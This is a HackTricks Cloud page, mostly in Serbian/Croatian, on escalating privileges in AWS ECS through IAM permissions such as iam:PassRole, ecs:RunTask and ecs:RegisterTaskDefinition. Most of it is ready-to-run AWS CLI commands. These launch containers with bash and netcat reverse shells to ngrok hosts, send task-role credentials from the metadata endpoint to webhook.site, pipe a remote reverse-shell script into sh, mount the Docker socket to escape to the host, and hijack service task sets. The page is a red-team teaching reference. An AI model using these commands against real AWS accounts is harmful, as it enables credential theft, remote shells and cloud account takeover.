AWS - ECS Privesc

Reading time: 10 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

ECS

Više informacija o ECS u:

AWS - ECS Enum

`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`

Napadač koji zloupotrebljava iam:PassRole, ecs:RegisterTaskDefinition i ecs:RunTask dozvole u ECS-u može generisati novu task definiciju sa zlonamernim kontejnerom koji krade metadata kredencijale i pokrenuti je.

bash

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Kreirajte webhook na sajtu kao što je webhook.site

bash


# Create file container-definition.json
[
{
"name": "exfil_creds",
"image": "python:latest",
"entryPoint": ["sh", "-c"],
"command": [
"CREDS=$(curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}); curl -X POST -H 'Content-Type: application/json' -d \"$CREDS\" https://webhook.site/abcdef12-3456-7890-abcd-ef1234567890"
]
}
]

# Run task definition, uploading the .json file
aws ecs register-task-definition \
--family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 \
--memory 512 \
--requires-compatibilities FARGATE \
--container-definitions file://container-definition.json

# Check the webhook for a response

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potencijalni uticaj: Direktan privesc na drugu ECS ulogu.

`iam:PassRole`,`ecs:RunTask`

Napadač koji ima dozvole iam:PassRole i ecs:RunTask može pokrenuti novi ECS task sa izmenjenim vrednostima execution role, task role i command kontejnera. Komanda ecs run-task (CLI) sadrži flag --overrides koji omogućava promenu u runtime-u executionRoleArn, taskRoleArn i command kontejnera bez menjanja task definition.

Navedene IAM uloge za taskRoleArn i executionRoleArn moraju u svojoj trust policy dozvoliti da ih ecs-tasks.amazonaws.com preuzme.

Takođe, napadač treba da zna:

ime ECS klastera
VPC Subnet
Security group (Ako security group nije navedena, koristiće se podrazumevana)
Task Definition name i revizija
ime kontejnera

bash

aws ecs run-task \
--cluster <cluster-name> \
--launch-type FARGATE \
--network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
--task-definition <task-definition:revision> \
--overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": <container-name>,
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

U gornjem isječku koda napadač menja samo vrednost taskRoleArn. Međutim, napadač mora imati dozvolu iam:PassRole nad taskRoleArn navedenim u komandi i nad executionRoleArn navedenim u definiciji taska da bi napad bio moguć.

Ako IAM role koju napadač može proslediti ima dovoljno privilegija da povuče ECR sliku i pokrene ECS task (ecr:BatchCheckLayerAvailability, ecr:GetDownloadUrlForLayer,ecr:BatchGetImage,ecr:GetAuthorizationToken), onda napadač može navesti istu IAM ulogu za oba executionRoleArn i taskRoleArn u ecs run-task komandi.

aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"executionRoleArn":"arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": "<container-name>",
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

Potential Impact: Direktan privesc na bilo koju ECS task rolu.

`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`

Baš kao u prethodnom primeru, napadač koji zloupotrebljava permisije iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask u ECS-u može generisati novu task definition sa malicioznim kontejnerom koji krade metadata credentials i pokrenuti je.
Međutim, u ovom slučaju potreban je container instance da bi se pokrenula maliciozna task definition.

bash

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potencijalni uticaj: Direktan privesc na bilo koju ECS rolu.

`iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`

Baš kao u prethodnom primeru, napadač koji zloupotrebljava iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService ili ecs:CreateService dozvole u ECS-u može da generiše novu task definiciju sa malicioznim kontejnerom koji krade metadata kredencijale i pokrene je kreiranjem novog servisa sa najmanje jednim task-om koji radi.

bash

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Potencijalni uticaj: Direktan privesc na bilo koju ECS ulogu.

`iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)`

Zapravo, samo sa tim dozvolama moguće je koristiti overrides da izvršite proizvoljne komande u kontejneru sa proizvoljnom ulogom koristeći nešto poput:

bash

aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"

Potencijalni uticaj: Direct privesc to any ECS role.

`ecs:RegisterTaskDefinition`, `(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`

Ovaj scenarij je sličan prethodnim, ali bez dozvole iam:PassRole.
Ovo je i dalje interesantno zato što, ako možete pokrenuti proizvoljan container, čak i bez role, mogli biste pokrenuti privilegovani container da pobegnete na node i ukrasti EC2 IAM rolu i role drugih ECS containera koji se izvršavaju na node-u.
Možete čak i prisiliti druge tasks da se pokrenu unutar EC2 instance koju kompromitujete kako biste ukrali njihove credentials (kao što je opisano u Privesc to node section).

warning

Ovaj napad je moguć samo ako ECS cluster koristi EC2 instance, a ne Fargate.

bash

printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json

printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json


aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json


aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell

`ecs:ExecuteCommand`, `ecs:DescribeTasks,``(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`

Napadač koji ima ecs:ExecuteCommand, ecs:DescribeTasks može izvršavati komande unutar pokrenutog containera i eksfiltrirati IAM role prikačenu na njega (potrebne su describe dozvole jer su neophodne za pokretanje aws ecs execute-command).
Međutim, da bi se to uradilo, container instance mora da pokreće ExecuteCommand agent (što po defaultu nije).

Stoga napadač može pokušati da:

Pokušati pokrenuti komandu u svakom pokrenutom containeru

bash

# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo "  Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"

Ako ima ecs:RunTask, pokrenite task sa aws ecs run-task --enable-execute-command [...]
Ako ima ecs:StartTask, pokrenite task sa aws ecs start-task --enable-execute-command [...]
Ako ima ecs:CreateService, kreirajte service sa aws ecs create-service --enable-execute-command [...]
Ako ima ecs:UpdateService, ažurirajte service sa aws ecs update-service --enable-execute-command [...]

Možete pronaći primere tih opcija u prethodnim ECS privesc sekcijama.

Potential Impact: Privesc to a different role attached to containers.

`ssm:StartSession`

Pogledajte na ssm privesc page kako možete zloupotrebiti ovu dozvolu da privesc to ECS:

AWS - SSM Privesc

`iam:PassRole`, `ec2:RunInstances`

Pogledajte na ec2 privesc page kako možete zloupotrebiti ove dozvole da privesc to ECS:

AWS - EC2 Privesc

`ecs:RegisterContainerInstance`, `ecs:DeregisterContainerInstance`, `ecs:StartTask`, `iam:PassRole`

An attacker with these permissions could potentially register an EC2 instance in an ECS cluster and run tasks on it. Ovo bi moglo omogućiti attacker-u da izvrši proizvoljan kod u kontekstu ECS taskova.

TODO: Is it possible to register an instance from a different AWS account so tasks are run under machines controlled by the attacker??

`ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets`

note

TODO: Test this

An attacker with the permissions ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, and ecs:DescribeTaskSets can create a malicious task set for an existing ECS service and update the primary task set. Ovo omogućava attacker-u da izvrši proizvoljan kod unutar servisa.

bash

# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

Potencijalni uticaj: Izvršavanje proizvoljnog koda u pogođenom servisu, što može uticati na njegovu funkcionalnost ili dovesti do eksfiltracije osetljivih podataka.

Reference

https://ruse.tech/blogs/ecs-attack-methods

tip

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

HackTricks Cloud